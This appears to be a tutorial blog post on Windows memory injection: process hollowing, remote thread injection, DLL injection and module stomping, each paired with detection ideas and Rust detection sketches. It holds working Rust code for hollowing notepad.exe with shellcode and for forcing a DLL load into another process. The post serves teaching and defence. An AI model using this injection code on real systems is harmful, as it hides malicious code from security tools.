Introduction to Memory Injection

2024-03-06


As security software gets smarter and more effective, the techniques for hiding from it have evolved as well. A number of methods and tactics are employed to achieve full memory residence, thwarting many detection mechanisms. Understanding these implementations is essential to developing solutions to the problem.

The threat of memory-resident, or "file-less", malware is not at all new. For years, threat actors have used these techniques to evade detection and enhance the effectiveness of ransomware, banking malware, and even toolkits such as Metasploit and Cobalt Strike.

But how do these things work? In truth, there is nothing particularly complicated about them once one understands the operating system features and capabilities leveraged to carry out these attacks.

The Basics

To begin, let's look at application code as it is being run. Simplistically, we can think of a program a little like this:

|---code---|---heap memory---|
  ^- execution pointer

There is a lot left out of this little diagram, namely the stack and where certain data is located. Most executable formats also contain tables holding symbols, debug information, import and export sections, etc. For now, we don't need to look at these.

The magic of memory injection is changing the location of the execution pointer to some custom location housing the code we want to run. This interrupts the actual flow of the application and allows the "attacker" to hijack the rest of the program's lifetime.

Now we'll take a look at some simple breakdowns of various techniques to get code loaded into an application and alter its execution.

Payload

Throughout the rest of this post, I will reference a "payload" to inject. There are a number of ways to create one, but a simple and effective method is to use Metasploit to produce some message box shellcode (or whatever else you prefer).

Process Hollowing

To support features like debugging, operating systems provide breakpoints that halt execution so the state of the running process can be inspected. Another useful feature is the "state" an application is in when it is spawned. In general, when you run a program, it simply starts executing as a normal process. There are other states, however, including the SUSPENDED state. Here the system creates the process and maps the executable image into memory with its sections at their proper locations, but this is where it stops. The main thread has been created with the program's entry point as its start address, but it does not proceed with the actual execution. (On Windows, the user-mode loader in ntdll, which resolves imports, has not run yet either; it does so once the thread is resumed.)

This is where we can get clever. By starting the process in a suspended state and knowing where the code section is located, we can now overwrite the normal functionality of the application with our custom code. This has the fun side effect of the application appearing as though it is the legitimate original.

Example

Now let's take a peek at what this can look like in actual code. First, we need to create a process in a suspended state. I am going to use Windows examples, even though the same technique can be applied to Linux and macOS (the latter requires code-signed binaries to access some of the necessary APIs, however).

Luckily for us, MSDN has fairly helpful documentation on process creation flags. Most importantly for our purposes:

CREATE_SUSPENDED 0x00000004 The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called.

Quick disclaimer: much of this code assumes we are dealing with 64-bit processes; in reality we should account for both 32-bit and 64-bit applications.

use std::{
    ffi::CString,
    mem::{size_of, zeroed},
    ptr::null_mut,
};
use winapi::{
    ctypes::c_void,
    um::{
        errhandlingapi::GetLastError,
        memoryapi::WriteProcessMemory,
        processthreadsapi::{CreateProcessA, ResumeThread, PROCESS_INFORMATION, STARTUPINFOA},
        winbase::CREATE_SUSPENDED,
        winnt::HANDLE,
    },
};

// Declared by hand since this is an ntdll export.
// The return value is an NTSTATUS (0 on success).
#[link(name = "ntdll")]
extern "system" {
    fn NtQueryInformationThread(
        ThreadHandle: HANDLE,
        ThreadInformationClass: u32,
        ThreadInformation: *mut c_void,
        ThreadInformationLength: u32,
        ReturnLength: *mut u32,
    ) -> i32;
}

let mut startup_info: STARTUPINFOA = unsafe { zeroed() };
// CreateProcess requires cb to hold the size of the structure
startup_info.cb = size_of::<STARTUPINFOA>() as u32;
let mut process_info: PROCESS_INFORMATION = unsafe { zeroed() };

let c_path = CString::new(r"c:\windows\system32\notepad.exe").unwrap();

if 0 == unsafe {
    CreateProcessA(
        c_path.as_ptr(),   // application to launch
        null_mut(),        // no command line
        null_mut(),
        null_mut(),
        0,                 // do not inherit handles
        CREATE_SUSPENDED,  // map the image but do not run the main thread
        null_mut(),
        null_mut(),
        &mut startup_info,
        &mut process_info,
    )
} {
    panic!("Could not create the process to hollow: {}", unsafe { GetLastError() });
}

At this point, a notepad.exe process is loaded up and ready for some plain text editing. But we have different plans! This is where things start to get fun. To figure out where to inject our shellcode, we really need to find the execution entry point. Luckily for us, the PROCESS_INFORMATION structure contains a handle to the main thread of the loaded process. We can query the information about this thread to retrieve the entry address!

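let mut entry_point: usize = 0;

let status = unsafe {
    NtQueryInformationThread(
        process_info.hThread,
        9, // ThreadQuerySetWin32StartAddress; see note below!
        &mut entry_point as *mut _ as _,
        size_of::<usize>() as _,
        null_mut(),
    )
};
if status != 0 {
    panic!("NtQueryInformationThread failed: {:#x}", status);
}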

The information class used here, 9 (ThreadQuerySetWin32StartAddress), is not officially documented. However, several projects that aim to document and implement these functions provide descriptions of it, such as ntinternals.net.

We now have everything we need. Assuming payload holds our shellcode as a Vec<u8>, we write it over the entry point:

let mut bytes_out = 0;

// overwrite the code at the entry point with the payload
if unsafe {
    WriteProcessMemory(
        process_info.hProcess,
        entry_point as _,
        payload.as_ptr() as _,
        payload.len(),
        &mut bytes_out,
    )
} == 0
{
    panic!("Could not write process memory: {}", unsafe { GetLastError() });
}

The last thing we need to do is resume our process thread:

unsafe { ResumeThread(process_info.hThread) };

You will now see a message box, if you chose to go that route. If you open Windows Task Manager, you will also see an instance of notepad.exe running. Viewing the details of the process shows an application that appears completely legitimate and indistinguishable from a "normal" instance of the same process.

Detection

Generally speaking, this isn't a conceptually difficult attack to detect. If we have both the original code on disk and the code in memory, we can compare them for differences. An issue arises due to a side effect of the loading process. Programs are compiled with the addresses of functions and variables at various offsets inside the binary code, and the loader adjusts these when the program is loaded. This does two things: first, it moves sections to their memory-aligned locations, since the alignment on disk often differs from the alignment in memory. Second, Address Space Layout Randomization (ASLR) loads the image at a randomized base address, and the loader patches absolute addresses to match. ASLR is intended to thwart attacks that rely on knowing the addresses of code to call, such as buffer overflow exploits.
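To compare disk and memory at all, each byte first has to be located in both layouts. The sketch below assumes the section headers have already been parsed into a hypothetical Section struct (field names borrowed from the PE section header's VirtualAddress, VirtualSize, PointerToRawData and SizeOfRawData) and translates a relative virtual address (RVA) into the file offset that holds the same byte.

```rust
/// The subset of a PE section header needed to map between file and memory.
/// (Hypothetical struct; names follow the PE section header fields.)
struct Section {
    virtual_address: u32,     // VirtualAddress: RVA where the section is mapped
    virtual_size: u32,        // VirtualSize: size of the section in memory
    pointer_to_raw_data: u32, // PointerToRawData: file offset of the section
    size_of_raw_data: u32,    // SizeOfRawData: size of the section on disk
}

/// Translate an RVA into the file offset holding the same byte, or None if
/// the RVA is outside every section or not backed by data in the file.
fn rva_to_file_offset(sections: &[Section], rva: u32) -> Option<u32> {
    sections.iter().find_map(|s| {
        // distance from the start of this section (None if the RVA is before it)
        let delta = rva.checked_sub(s.virtual_address)?;
        if delta < s.virtual_size && delta < s.size_of_raw_data {
            Some(s.pointer_to_raw_data + delta)
        } else {
            None
        }
    })
}
```

With this mapping, the byte at image_base + rva in memory can be lined up with the byte at the returned file offset; what remains is accounting for the addresses ASLR caused the loader to patch.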

Knowing this, we can try to resolve these differences in a couple of ways. Comparing a known address in memory (such as the module's actual load address) with the preferred base address recorded on disk lets us compute the ASLR offset. We would then need to account for that offset when comparing the code on disk with the code in memory.
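As a minimal sketch of that idea, assuming a 64-bit image and that the offsets of the patched 8-byte absolute addresses are already known (for example, parsed from the image's base relocation table elsewhere), the delta can be subtracted back out of a copy of the in-memory code before diffing it against disk. The function names are illustrative, not from any library.

```rust
/// How far the loader moved the image: actual load address minus the
/// preferred ImageBase recorded in the PE optional header.
fn aslr_delta(preferred_base: u64, actual_base: u64) -> u64 {
    actual_base.wrapping_sub(preferred_base)
}

/// Undo the loader's patches in a copy of the in-memory code. Each entry in
/// `reloc_offsets` is assumed to mark an 8-byte little-endian absolute address.
fn unrelocate(memory: &[u8], reloc_offsets: &[usize], delta: u64) -> Vec<u8> {
    let mut out = memory.to_vec();
    for &off in reloc_offsets {
        // skip offsets whose 8-byte slot would run past the buffer
        if out.len() < 8 || off > out.len() - 8 {
            continue;
        }
        let mut slot = [0u8; 8];
        slot.copy_from_slice(&out[off..off + 8]);
        let original = u64::from_le_bytes(slot).wrapping_sub(delta);
        out[off..off + 8].copy_from_slice(&original.to_le_bytes());
    }
    out
}

/// Offsets at which the (normalized) memory bytes differ from the disk bytes.
/// Only the overlapping length of the two buffers is compared.
fn diff_offsets(disk: &[u8], memory: &[u8]) -> Vec<usize> {
    disk.iter()
        .zip(memory)
        .enumerate()
        .filter(|(_, (a, b))| a != b)
        .map(|(i, _)| i)
        .collect()
}
```

After normalization an untouched image should produce an empty diff, so any offsets that remain are candidates for overwritten code.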

Alternatively, we could perform a likeness comparison between the code segments and choose some acceptable amount of drift before flagging a hollowing attack.
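A rough sketch of such a likeness check follows, assuming the two code buffers have already been lined up in the same layout. The byte-position matching metric and the threshold parameter are illustrative choices; a real threshold would need tuning against known-good processes.

```rust
/// Fraction (0.0..=1.0) of byte positions that match between the on-disk
/// and in-memory code. Extra bytes in the longer buffer count as mismatches.
fn similarity(disk: &[u8], memory: &[u8]) -> f64 {
    let longest = disk.len().max(memory.len());
    if longest == 0 {
        return 1.0;
    }
    let matching = disk.iter().zip(memory).filter(|(a, b)| a == b).count();
    matching as f64 / longest as f64
}

/// Flag the code as possibly hollowed when similarity drops below the
/// accepted drift. `min_similarity` is a tuning knob, not a known-good value.
fn looks_hollowed(disk: &[u8], memory: &[u8], min_similarity: f64) -> bool {
    similarity(disk, memory) < min_similarity
}
```

Small, scattered differences (unnormalized relocations, runtime patches) keep similarity high, while a payload written over a large part of the code drives it down sharply.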

This is further complicated by technologies like Windows-on-Windows 64 (WOW64), the subsystem for running 32-bit applications on 64-bit Windows. This system ends up rewriting and shimming code in 32-bit applications, which fundamentally changes them and makes comparison even more difficult.

Inject and Spawn

This is a very common technique for running code in a remote process. The basic concept is that some executable code is written into allocated heap space in a running process. A new thread is then spawned in that process with the heap address as the starting location.

If you have some ready-made shellcode, this process is pretty simple:

OpenProcess()
VirtualAllocEx()
WriteProcessMemory()
CreateRemoteThread()

If you don't have shellcode and want to execute something like a raw executable file, you will need to do some basic memory management to replicate the loader's functionality. This ensures that relocations are applied for the address the image actually lands at (in accordance with ASLR), that import addresses are resolved, and that sections sit at their expected offsets.

Detection

A common practice for finding injected executables is to look for executable headers in places they should not be, such as heap space. This is the idea behind the malfind plugin in Volatility. Locating shellcode running in memory can be trickier, but looking at where threads start gives a hint: a thread that starts inside a module's code section is expected, while one that starts in heap space is suspicious.
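Both heuristics can be sketched in a few lines, assuming the memory region has already been read (for example with ReadProcessMemory) and that the module list and thread start addresses have been collected elsewhere. The Module struct and the function names are hypothetical. The header check looks for "MZ" followed by a "PE\0\0" signature at the offset stored in the DOS header's e_lfanew field (offset 0x3C).

```rust
/// Offsets in `region` that look like the start of a PE image: an "MZ" DOS
/// header whose e_lfanew field (offset 0x3C) points at a "PE\0\0" signature.
fn find_pe_headers(region: &[u8]) -> Vec<usize> {
    let mut hits = Vec::new();
    // a DOS header is 0x40 bytes; anything shorter cannot hold one
    if region.len() < 0x40 {
        return hits;
    }
    for start in 0..=region.len() - 0x40 {
        if region[start..start + 2] != b"MZ"[..] {
            continue;
        }
        let mut raw = [0u8; 4];
        raw.copy_from_slice(&region[start + 0x3C..start + 0x40]);
        let pe = start + u32::from_le_bytes(raw) as usize;
        if region.get(pe..pe + 4) == Some(&b"PE\0\0"[..]) {
            hits.push(start);
        }
    }
    hits
}

/// A loaded module's name and address range (hypothetical; collected elsewhere).
struct Module {
    name: String,
    base: u64,
    size: u64,
}

/// The module whose image contains `start`; None means the thread begins
/// outside every loaded module, e.g. in heap or other private memory.
fn owning_module(modules: &[Module], start: u64) -> Option<&Module> {
    modules.iter().find(|m| start >= m.base && start - m.base < m.size)
}
```

A header hit in private memory, or a thread start with no owning module, is a lead worth investigating rather than proof of injection; JIT compilers, for example, legitimately run code from private memory.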

DLL Injection

While this process is often referred to as "DLL Injection", that name is very Windows-centric, and it should be noted that this technique applies to any shared object format, such as .so on Linux or .dylib on macOS.

This process works by causing a running application to load a dynamic library of your choice and run it. This is similar to an "Inject and Spawn" attack but instead of writing program code we write a string containing the path to the library, and then execute a call to LoadLibrary inside the process using CreateRemoteThread.

This attack is helpful for masking the activity of nefarious code inside a trusted application, but it requires the library to be on disk, thus exposing it to possible detection by security products inspecting data at rest.

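use std::{ffi::CString, ptr::null_mut};
use winapi::{
    ctypes::c_void,
    um::{
        handleapi::CloseHandle,
        libloaderapi::{GetModuleHandleA, GetProcAddress},
        memoryapi::{VirtualAllocEx, WriteProcessMemory},
        processthreadsapi::{CreateRemoteThread, OpenProcess},
        synchapi::WaitForSingleObject,
        winbase::INFINITE,
        winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PROCESS_ALL_ACCESS},
    },
};

// signature of a thread start routine; LoadLibraryA takes a single
// pointer argument, so it can be used as one
type FnThreadStart = unsafe extern "system" fn(*mut c_void) -> u32;

let process = unsafe { OpenProcess(PROCESS_ALL_ACCESS, 0, pid) };
if process.is_null() {
    panic!("Cannot open target process");
}

// include the trailing NUL so LoadLibraryA receives a terminated string
let c_path = CString::new(r"c:\path\to\library.dll")?;
let path_bytes = c_path.as_bytes_with_nul();

// this gives us the memory location of the string
// in the remote process
let dll_path = unsafe {
    VirtualAllocEx(
        process,
        null_mut(),
        path_bytes.len(),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE,
    )
};
if dll_path.is_null() {
    panic!("Cannot allocate memory in remote process");
}

// write the library path to the string location
if 0 == unsafe {
    WriteProcessMemory(
        process,
        dll_path,
        path_bytes.as_ptr() as _,
        path_bytes.len(),
        null_mut(),
    )
} {
    panic!("Cannot write path to remote process");
}

let kernel32 = CString::new("kernel32")?;
let load_library = CString::new("LoadLibraryA")?;

// get the function address of "LoadLibraryA"; system DLLs such as kernel32
// share one base address across processes of the same architecture (per
// boot), so the local address is also valid in the target
let load_library = unsafe {
    GetProcAddress(GetModuleHandleA(kernel32.as_ptr()), load_library.as_ptr())
};
if load_library.is_null() {
    panic!("Cannot resolve LoadLibraryA");
}

let mut thread_id = 0;

// now we call "LoadLibraryA()" in the target
// process and it will load the dll
let thread = unsafe {
    CreateRemoteThread(
        process,
        null_mut(),
        0,
        Some(std::mem::transmute::<_, FnThreadStart>(load_library)),
        dll_path,
        0,
        &mut thread_id,
    )
};
if thread.is_null() {
    panic!("Cannot create remote thread");
}

// simply wait for the call to "LoadLibraryA()" to complete
unsafe {
    WaitForSingleObject(thread, INFINITE);
    CloseHandle(thread);
    CloseHandle(process);
}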

Detection

Detecting library injection can be tricky, because it is valid for a running application to dynamically load a dependency. In general, an application will maintain an import table that will contain the functions to use from a dependency. Comparing the current loaded libraries with those referenced in the import table is one naive method for detecting an injection. However, if an application normally dynamically loads various libraries, these will not be listed in the import table to begin with, so this detection method falls apart.
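The naive comparison might look like the following sketch, assuming the imported DLL names and the loaded module names have been collected elsewhere (for example by parsing the import directory and enumerating the process's modules). The function name is hypothetical.

```rust
use std::collections::HashSet;

/// Loaded module names that do not appear among the imported DLL names.
/// Windows module names are case-insensitive, so both sides are lowercased.
fn unexpected_modules(imported: &[&str], loaded: &[&str]) -> Vec<String> {
    let expected: HashSet<String> = imported.iter().map(|n| n.to_ascii_lowercase()).collect();
    loaded
        .iter()
        .map(|n| n.to_ascii_lowercase())
        .filter(|n| !expected.contains(n))
        .collect()
}
```

In practice the expected set should also cover the executable itself and the imports of every legitimately loaded DLL, since dependencies of dependencies never appear in the executable's own import table; the dynamic-loading problem described above remains either way.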

Module Stomping

This is a fun mashup of library injection and process hollowing. The basic principles have already been covered. Here we force a process to load a benign library, but before we call its entry function, we overwrite it with our shellcode (or an entire library if we wish).

Get a process handle
Allocate a string to the path we want to load in the process
Call LoadLibrary
Overwrite the entry point function
Call the entry point function

Detection

Similar to process hollowing and library injection, finding stomped modules can be a bit of a chore. Determining whether the module belongs in the process (via the import table) is a first step, though not without the issues described previously. Enumerating the loaded modules in the process and then auditing each code segment against what is on disk is another solution. However, this faces the same relocation problems, along with the 32-bit/64-bit translation and patching described earlier.
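For the auditing step, a page-granular diff can help localize what changed. This sketch assumes the on-disk section has already been laid out as it would be in memory, that relocations have been undone, and that pages are 4 KiB; the function names are hypothetical. It reports the offsets of modified pages and whether the page containing the entry point is among them, which is where an overwritten entry function would show up.

```rust
/// Page size used for the comparison (4 KiB, the usual x86/x64 page size).
const PAGE_SIZE: usize = 0x1000;

/// Offsets of the pages that differ between the on-disk code and the loaded
/// code. A length mismatch marks the trailing pages as modified.
fn modified_pages(disk: &[u8], memory: &[u8]) -> Vec<usize> {
    let len = disk.len().max(memory.len());
    (0..len)
        .step_by(PAGE_SIZE)
        .filter(|&off| {
            let end = (off + PAGE_SIZE).min(len);
            // get() returns None when a buffer ends before this page does,
            // which never equals the other side's Some(..)
            disk.get(off..end) != memory.get(off..end)
        })
        .collect()
}

/// True if the page containing `entry_offset` (an offset into the same
/// section) is among the modified pages.
fn entry_point_modified(pages: &[usize], entry_offset: usize) -> bool {
    pages.contains(&(entry_offset / PAGE_SIZE * PAGE_SIZE))
}
```

Reporting pages rather than single bytes keeps the output short when a whole function has been replaced, and lines up with how memory protections are applied.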

Conclusion

Memory injection is a very interesting and useful technique for concealing the execution of code. While detecting these mechanisms can be tricky, understanding how they work helps demystify them. The term "file-less malware" came into vogue several years ago, but process injection has been in use for much longer than it has been present in the collective consciousness of the security industry.

Hopefully these simple demonstrations help someone to understand the basic methodologies for some popular memory injection techniques!